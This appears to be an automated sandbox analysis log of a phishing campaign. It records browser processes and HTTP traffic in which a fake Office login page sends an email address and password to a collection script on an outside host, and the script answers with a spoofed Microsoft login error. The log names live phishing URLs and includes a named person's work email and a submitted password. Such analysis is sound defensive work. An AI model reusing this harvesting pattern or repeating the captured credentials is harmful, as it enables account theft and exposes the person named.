                                TimestampBytes transferredDirectionData
                                2025-01-14 03:33:53 UTC676OUTPOST /m/script.php HTTP/1.1
                                Host: e2dpryeqzl.jappeckino.shop
                                Connection: keep-alive
                                Content-Length: 102
                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                Accept: */*
                                Content-Type: application/x-www-form-urlencoded; charset=UTF-8
                                sec-ch-ua-mobile: ?0
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                sec-ch-ua-platform: "Windows"
                                Origin: https://mudedevidaparasempre.com.br
                                Sec-Fetch-Site: cross-site
                                Sec-Fetch-Mode: cors
                                Sec-Fetch-Dest: empty
                                Referer: https://mudedevidaparasempre.com.br/
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-US,en;q=0.9
                                2025-01-14 03:33:53 UTC102OUTData Raw: 61 63 74 69 6f 6e 3d 73 69 67 6e 75 70 26 65 6d 61 69 6c 3d 6f 6c 69 76 69 65 72 2e 64 6f 7a 61 74 25 34 30 69 6e 6e 6f 63 61 70 2e 63 6f 6d 26 65 70 61 73 73 3d 57 53 34 61 70 25 37 42 36 28 25 33 42 67 4c 45 48 4f 35 62 26 6d 6f 64 65 3d 4f 66 66 69 63 65 4c 6f 67 69 6e 26 6d 61 69 6e 68 6f 73 74 3d 30
                                Data Ascii: action=signup&email=olivier.dozat%40innocap.com&epass=WS4ap%7B6(%3BgLEHO5b&mode=OfficeLogin&mainhost=0
                                2025-01-14 03:34:00 UTC496INHTTP/1.1 200 OK
                                Date: Tue, 14 Jan 2025 03:33:53 GMT
                                Server: Apache/2.4.62 (Unix) OpenSSL/3.2.2
                                X-Powered-By: PHP/7.4.33
                                Access-Control-Allow-Headers: Authorization, Content-Type
                                Access-Control-Allow-Origin: *
                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                Cache-Control: no-store, no-cache, must-revalidate
                                Pragma: no-cache
                                Set-Cookie: PHPSESSID=l629s6ru65qqq4olrra07gu14q; path=/
                                Vary: User-Agent
                                Connection: close
                                Transfer-Encoding: chunked
                                Content-Type: application/php; charset=utf-8
                                2025-01-14 03:34:00 UTC79INData Raw: 34 39 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 73 67 22 3a 22 6c 6f 67 69 6e 5f 66 61 69 6c 65 64 22 2c 22 64 74 79 22 3a 22 6c 6f 67 69 6e 2e 6d 69 63 72 6f 73 6f 66 74 6f 6e 6c 69 6e 65 2e 63 6f 6d 22 7d 0d 0a
                                Data Ascii: 49{"status":"error","msg":"login_failed","dty":"login.microsoftonline.com"}
                                2025-01-14 03:34:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                29192.168.2.449866203.161.57.1394434176C:\Program Files\Google\Chrome\Application\chrome.exe
                                TimestampBytes transferredDirectionData
                                2025-01-14 03:34:00 UTC408OUTGET /m/script.php HTTP/1.1
                                Host: e2dpryeqzl.jappeckino.shop
                                Connection: keep-alive
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                Accept: */*
                                Sec-Fetch-Site: none
                                Sec-Fetch-Mode: cors
                                Sec-Fetch-Dest: empty
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-US,en;q=0.9
                                Cookie: PHPSESSID=85on4fjog8grd7jidvbu7erq4i
                                2025-01-14 03:34:01 UTC438INHTTP/1.1 200 OK
                                Date: Tue, 14 Jan 2025 03:34:01 GMT
                                Server: Apache/2.4.62 (Unix) OpenSSL/3.2.2
                                X-Powered-By: PHP/7.4.33
                                Access-Control-Allow-Headers: Authorization, Content-Type
                                Access-Control-Allow-Origin: *
                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                Cache-Control: no-store, no-cache, must-revalidate
                                Pragma: no-cache
                                Vary: User-Agent
                                Connection: close
                                Transfer-Encoding: chunked
                                Content-Type: application/php; charset=utf-8
                                2025-01-14 03:34:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Click to jump to process

                                Click to jump to process

                                Click to jump to process

                                Target ID:0
                                Start time:22:32:47
                                Start date:13/01/2025
                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                Imagebase:0x7ff76e190000
                                File size:3'242'272 bytes
                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:low
                                Has exited:false

                                Target ID:2
                                Start time:22:32:49
                                Start date:13/01/2025
                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1988,i,12937315425424320999,1974519677916407761,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                Imagebase:0x7ff76e190000
                                File size:3'242'272 bytes
                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:low
                                Has exited:false

                                Target ID:3
                                Start time:22:32:56
                                Start date:13/01/2025
                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "http://bebizicon.com/Campususa/index.xml#?email=b2xpdmllci5kb3phdEBpbm5vY2FwLmNvbQ=="
                                Imagebase:0x7ff76e190000
                                File size:3'242'272 bytes
                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:low
                                Has exited:true

                                No disassembly